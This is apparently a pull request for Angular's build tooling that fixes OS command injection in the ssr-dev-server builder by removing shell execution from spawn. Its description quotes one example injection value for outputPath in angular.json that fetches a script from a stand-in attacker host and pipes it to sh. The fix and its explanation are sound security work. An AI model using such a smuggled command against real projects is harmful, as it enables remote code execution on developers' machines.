### PR TITLE
fix(build-angular): prevent OS command injection in ssr-dev-server builder

### DIFF
--- a/packages/angular_devkit/build_angular/src/builders/ssr-dev-server/index.ts
+++ b/packages/angular_devkit/build_angular/src/builders/ssr-dev-server/index.ts
@@ -236,14 +236,14 @@ function startNodeServer(
   const path = join(outputPath, 'main.js');
   const env = { ...process.env, PORT: '' + port, NG_ALLOWED_HOSTS: host ?? 'localhost' };
 
-  const args = ['--enable-source-maps', `"${path}"`];
+  const args = ['--enable-source-maps', path];
   if (inspectMode) {
     args.unshift('--inspect-brk');
   }
 
   return of(null).pipe(
     delay(0), // Avoid EADDRINUSE error since it will cause the kill event to be finish.
-    switchMap(() => spawnAsObservable('node', args, { env, shell: true })),
+    switchMap(() => spawnAsObservable(process.execPath, args, { env })),
     tap((res) => log({ stderr: res.stderr, stdout: res.stdout }, logger)),
     ignoreElements(),
     // Emit a signal after the process has been started

--- a/packages/angular_devkit/build_angular/src/builders/ssr-dev-server/utils.ts
+++ b/packages/angular_devkit/build_angular/src/builders/ssr-dev-server/utils.ts
@@ -29,7 +29,7 @@ export function spawnAsObservable(
   options: SpawnOptions = {},
 ): Observable<{ stdout?: string; stderr?: string }> {
   return new Observable((obs) => {
-    const proc = spawn(`${command} ${args.join(' ')}`, options);
+    const proc = spawn(command, args, options);
     if (proc.stdout) {
       proc.stdout.on('data', (data) => obs.next({ stdout: data.toString() }));
     }


### PR DESCRIPTION
`spawnAsObservable()` in `utils.ts` was building the shell command by concatenating `command` and `args` into a single string before passing it to `spawn()`. The call site in `startNodeServer()` (`index.ts`) was passing `shell: true` along with `outputPath` from the builder output embedded as `"${path}"` in the args array.

`outputPath` derives from the project's `angular.json` configuration. Because bash evaluates `$()` substitutions inside double-quoted strings, a value like `dist/$(curl attacker.com/x.sh|sh)` in `angular.json` causes the substitution to execute when `ng serve` is run — before Node.js is invoked.

Switching to the three-argument form of `spawn(command, args, options)` ensures arguments are passed directly to the OS via `execve()` without shell interpretation. The manual quoting around `path` and `shell: true` are no longer needed and have been removed.